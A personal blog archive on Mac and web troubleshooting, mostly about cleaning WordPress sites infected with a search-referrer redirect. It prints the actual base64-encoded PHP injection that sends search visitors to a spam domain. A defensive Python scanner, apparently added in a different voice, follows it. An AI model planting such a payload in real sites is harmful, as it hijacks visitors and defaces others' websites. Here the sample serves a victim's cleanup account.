Tag Archives: Mac OS X

WordPress + Google Search Result links redirected/hijacked/hacked

A couple weeks ago it was brought to my attention that when googling myself and then clicking on the Google search links, users were redirected to various spam websites instead of the actual website they wanted to visit. Since I don’t google myself to visit my personal & freelance websites (I visit them directly by typing the URL into the address bar), I was entirely unaware of this problem.

I started troubleshooting this problem by googling the keywords to all the websites I host. For every WordPress website that I hosted, the google search links were hijacked and redirected to spam sites. For any static HTML pages that I hosted, the google search links took me to the correct website.

This told me that every single one of my WordPress websites had been hacked and infected with a script. In fact, when troubleshooting, I discovered that not only was it the root level (home page) of the site, but all the sitelinks (the sub links shown underneath the main search result) had been infected as well. To me, this meant that the “virus” was at least in the header.php file of the WP install.

Coincidentally, I had just made the decision to switch hosting providers. I have been with BlueHost since June 2009 and honestly have never had any negative experiences. Within the past year, my work had a hugely negative experience with BlueHost. Long story short, all of our websites hosted with them vanished into the aether. This included all of our WordPress installs and our web team’s wiki. Their response to our trouble ticket was something along the lines of something blew up, nothing we can do, surely you understand. Fortunately, we do not understand and we do understand that rolling us to a backup is a reasonable expectation that they failed to see or execute. This experience terrifies me since I provide hosting for freelance clients. If their websites vanished one day with NO BACKUP, well… I’d be f’ed. As a consequence of this experience, I waited until my BlueHost hosting plan was close to expiration and then bought new hosting with DreamHost (recommended to me by a few coworkers).

Back to the hacked WordPress sites. I deduced that at the very least my header.php files were hacked, and they likely became that way because of a lack of security with my hosting provider as well as very slightly out of date WordPress installations. I needed to check my WP files on the server and then migrate all my domains and hosting off of BlueHost.

Saturday morning I checked my WP files. I began by checking index.php at the root level of the install and then in the wp-content subdirectories. EVERY SINGLE opening PHP tag was followed by this nastiness:

<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ2lnb3AuYW1lcmljYW51bmZpbmlzaGVkLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9")); ?>

Then, I checked my header.php file. EVERY SINGLE PHP tag was followed with this code. Literally every time my WP theme opens PHP to use a WP template tag, nasty infection virus code. Literally, metadata, keywords, title, everything, everything.

Obviously I’d been googling to troubleshoot this problem. All the google results were forums, blogs, discussion groups, etc talking about Norton, McAfee, Spider-something, and all other anti-virus software. Well it was obvious to me that the problem was not on my machine (I tested on my work Mac Pro, my home MacBook Pro, and my iPad) but on my server area. My wise husband said, “Hun, put ‘Mac’ on the end of your search.” Goodness sakes that was silly of me. Bam, I throw ‘Mac’ on the end of my search and all of a sudden I see the forums saying that it’s a server problem. That brilliant idea spurred another brilliant idea. I google the nasty infection code (shown above). Looky what I found:
http://www.cameronkeng.com/2012/04/04/guess-who-got-hacked-again-awesome-but-i-can-fix-it-perm/
Another poor soul whose WordPress site got hacked. He explains his solution to the problem here.

The bare bones “non-technical” solution that I thought of is to export your WP data to xml then re-import the data on a fresh WordPress installation. The probability of this solution working was confirmed by the link above. A few caveats or things to keep in mind…

  • Change hosting providers, and if you can afford it, opt for private hosting (shared hosting is the cheapest and it’s where they put you on a box with other people). If it happened to you once, it will happen to you again. Hubby suggested that it could be someone else that’s on the same box as me infecting everyone on the box. So even if I deleted my WP installs & did a fresh install, it is possible that the files would get hacked all over again within minutes.
  • Change your theme. All the installed themes are going to be infected too. Luckily I was running a child theme of 2011 and my child theme only had two php files with a small amount of customization. If you must keep the same theme, which I felt like I needed to, remove the virus code from the appropriate files, download locally, and zip up so you have a clean version of the theme you’re running.

The highly technical solution is to run a command line script on the server that finds all the files that have the virus code in them and duplicates all the files but without that code. Then it kills all the files that have the code. My command line juju is severely lacking and I’m terrified of that black box screen. This solution was mentioned in the two posts that guided me (linked above) and the actual script and nitty gritty details can be found here: http://tech.sarathdr.com/featured/wordpress-hacked-redirect-to-gigop-americanunfinished-com
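The cleanup described above, as an added example (it is not the script from the linked posts): it scans a WordPress tree for the injection shape shown in this post, decodes each payload for review, saves the infected original to a quarantine directory and rewrites the file without the injected call. The sample files, the `spam.example` address and all function names are constructed for illustration.

```python
import base64
import re
import tempfile
from pathlib import Path
# Added example. Shape from this post: "<?php" then eval(base64_decode("..."));
INJECTED = re.compile(rb'(<\?php)\s*eval\(base64_decode\("([A-Za-z0-9+/=]+)"\)\);')

def decode(payload):  # for review only; the payload is never executed
    try:
        return base64.b64decode(payload).decode("latin-1")
    except ValueError:  # binascii.Error is a ValueError subclass
        return "<not valid base64>"

def scan_tree(root):
    """Map each infected .php file under root to its decoded payloads."""
    findings = {}
    for path in sorted(Path(root).rglob("*.php")):
        payloads = [decode(m.group(2)) for m in INJECTED.finditer(path.read_bytes())]
        if payloads:
            findings[path] = payloads
    return findings

def clean_tree(root, quarantine):
    """Save each infected original in quarantine, then rewrite it without the call."""
    infected = list(scan_tree(root))
    for path in infected:
        original = path.read_bytes()
        saved = Path(quarantine) / path.relative_to(root)
        saved.parent.mkdir(parents=True, exist_ok=True)
        saved.write_bytes(original)  # evidence copy; keep it outside the web root
        path.write_bytes(INJECTED.sub(rb"\1 ", original))
    return infected

def build_sample_tree(root):
    """Constructed sample data: one infected theme file and one clean file."""
    payload = base64.b64encode(b'header("Location: http://spam.example/");').decode()
    theme = Path(root) / "wp-content" / "themes" / "child"
    theme.mkdir(parents=True)
    (theme / "header.php").write_text(
        f'<?php eval(base64_decode("{payload}")); bloginfo("name"); ?>\n'
        f'<title><?php eval(base64_decode("{payload}")); wp_title(); ?></title>\n')
    (Path(root) / "index.php").write_text('<?php require "wp-blog-header.php"; ?>\n')

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as site, tempfile.TemporaryDirectory() as jail:
        build_sample_tree(site)
        for path, payloads in scan_tree(site).items():
            print(path, payloads)
        print(clean_tree(site, jail))
```

Run `scan_tree` on its own first and read the decoded payloads before cleaning; a file that still matches after `clean_tree` means the injection uses a different shape than the one this pattern covers.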

I am ECSTATIC to report that downloading the XML export, downloading my child theme files, editing and then zipping my clean child theme files, changing hosting providers, doing a fresh WordPress install, uploading my XML, and reinstalling my clean child theme left me with a nearly perfect migration of my old website.

The only problem that I experienced is that some of my post images did not migrate over. What I did to work around that was download my entire /uploads/ folder from my old site and then upload the entire /uploads/ directory on my new server space. The image URLs within posts no longer returned 404s, woot woot! The only problem is that none of my [gallery] shortcodes work. I thought it was because the images are not linked to the post gallery, but my entire media library is empty. Frankly… I said eff it. At least all my data is here, my single images are here, my google search links take users to me, if I lose a few galleries… well that is a price that I am willing to pay.

A major win: VirtualBox installation + Windows 7

For nearly 3 months, my virtual machine at work was entirely conked out.

About the first week of December, I tried to upgrade my VirtualBox installation and it failed. I never could figure out what happened; I spent several days troubleshooting over the course of December and January. In the beginning of January, I was able to install a VERY old version of VirtualBox (I think 3.1?) but then my installation of Windows 7 completely failed. I gave up 3 weeks ago, and then found myself with a few slow hours this afternoon and decided to tackle it. Guess what? I SUCCEEDED!

This afternoon, I tried installing the latest version of VirtualBox (4.1.8) and it kept failing at the 95% mark of the installation. After some googling and forum reading, I discovered it possibly had something to do with an improper uninstall (this insight mainly came from this thread: https://www.virtualbox.org/ticket/1578 ).

From my 4.1.8 VirtualBox download, I ran the VirtualBox_Uninstall.tool. It opens up terminal, you have to type “Yes” and then it prompts you for your machine’s password. After that, it said something about kernels and can’t uninstall and rebooting (BTW, the only kernels I know about are the lovely extra crunchy popcorn kernels at the bottom of a popcorn bag). So I did a restart. When I was booted up again, I again opened the 4.1.8 VirtualBox download and ran VirtualBox_Uninstall.tool. This time, terminal ran a whole 4 seconds and returned that it was completely uninstalled. WOOT!

I then double-clicked VirtualBox.mpkg and the installation succeeded!

Once the installation completed, I followed this screenshot tutorial for configuring the virtual machine. At 99% through the tutorial, I wasn’t able to figure out how to define where my Windows 7 ISO file was, so then I followed this video tutorial for installing Windows 7. I was able to figure out where in the VirtualBox settings to define my Windows 7 ISO file in the first 2 minutes of the video.

My VirtualBox installation and Windows 7 installation WORKS LIKE A CHARM!

Looking back at the screenshot tutorial, after I watched the video tutorial, I see where I got lost. If I had looked a bit closer at the screenshot, I would’ve seen that the tutorial loads an ISO file.

Anyways, that doesn’t matter, what matters is that after my virtual machine going down the first week of December, I finally have it back!! WOO HOOO!!!!!

This makes for a Great Monday.

PS, In case you’re wondering… my work machine is a Mac OS X 10.6.8 (Snow Leopard), and I got VirtualBox 4.1.8 installed and it runs Windows 7 64-bit.

“The application Finder can’t be opened.”

Grr. This is the second time this has happened to me. I work on Snow Leopard at home and at work, but now twice at work I’ve gotten this fatal message:

“The application Finder can’t be opened.” -10810


I can’t remember what I was doing the first time it happened, but when it happened just now, I was attempting to delete 4 or 5 directories on a shared server. The directories were NOT huge; it shouldn’t have crashed Finder. But it did. I had to force quit Finder and then when I tried to open it again, I got that crappy error message.

But I found a solution via the googler.

  1. Open Terminal. For those who are scared to open Terminal, don’t worry I’m in the same boat. I promise it will be okay.
  2. Type this in to Terminal:
    /System/Library/CoreServices/Finder.app/Contents/MacOS/Finder &
  3. Hit Enter.
  4. Now the first time I hit enter, my Finder window popped open. I was happy, so I closed the Finder window & Terminal. Then I clicked on Finder in the dock, and I got that damn error again.

    So, second time through, I started over at Step #1 and repeated the process. The second time that I hit enter (Step #3), the Finder window did not open automatically. But the Finder icon in the dock had the bottom light, so I clicked on it and a Finder window popped open. Phew!

    But then I closed Terminal. When you go to close Terminal, it closes your Finder. Boo.

    Third time through, repeat all steps. Finder automatically opens when I hit enter this time. Hit up the googler again to find a fix.

  5. Type this in to Terminal: disown
  6. Hit Enter.
  7. Now close Terminal and your Finder should still stay open.

Wow… That was a huge bear. Hope Apple fixes that bug.

Many thanks to this person:
http://www.adeepbite.com/must-know-macosx-tips-and-tricks/the-application-finder-cant-be-opened/,
and this person:
http://utvv.blogspot.com/2010/01/how-to-fix-application-finder-cant-be.html

From a Cat loving Mac user

I love cats and I also am an Apple lover. The naming convention of Apple operating systems has never bothered me. In fact, I’ve only thought of it as EXTREMELY cool and a great use of branding. But others may have a difference of opinion and that was brought to my attention this morning when perusing the NYT website.

Check out this article that asks the question, “Is It Time for Apple to Retire the Cats?”

My firm answer: No.

Meow.

Cool snow leopard video on NYT

Check out this sweet video that describes OS updates with an easy-to-understand visual aesthetic. It focuses on Snow Leopard and why it is so innovative in the world of OS updates. Sweet stuff.

BTW, yesterday Mark went out and bought the Snow Leopard update for our Mac Pro at home. I didn’t have time to check it out when I got off of work yesterday, but he said it’s quite sweet and everything is A LOT faster.

Snow Leopard

Apple’s latest update for the Leopard OS has come out a month early. Mark was just telling me this past weekend that we need to go to the store and buy it — you can’t just download and install. That kind of sucks, but since we have an Apple Store in our city, it’s not too big of a deal.

Super hot that the update is called “snow leopard” and you can upgrade your mountain cat for just $30…that just shouts out how sexy Apple is…

It installs in 15 minutes, turns on quicker, opens web browsers quicker, and it is 7GB smaller than Leopard. This is sick shit folks. You can even open files on the Mac “side” while you’re running Windows on your Mac…no restart!! Woo hoo!

NYT says that the take-away message is:

Either way, the big story here isn’t really Snow Leopard. It’s the radical concept of a software update that’s smaller, faster and better — instead of bigger, slower and more bloated. May the rest of the industry take the hint.

Check out NYT’s full story here.

Chrome nudging closer to Safari in browser market

Chrome, the browser by Google, is moving closer and closer to Safari’s spot as the third spot in the browser market share. I have Chrome downloaded on Vista at home and it’s okay, but it certainly isn’t any better than Firefox. I used to only use Safari on Mac OS at home, but I became a loyal Firefox user a little over a year ago and generally only use Safari to preview websites in development. Anyways, there is an article in NYT about all the different browsers and where they stand in the market. Check out Chrome Threatens Safari.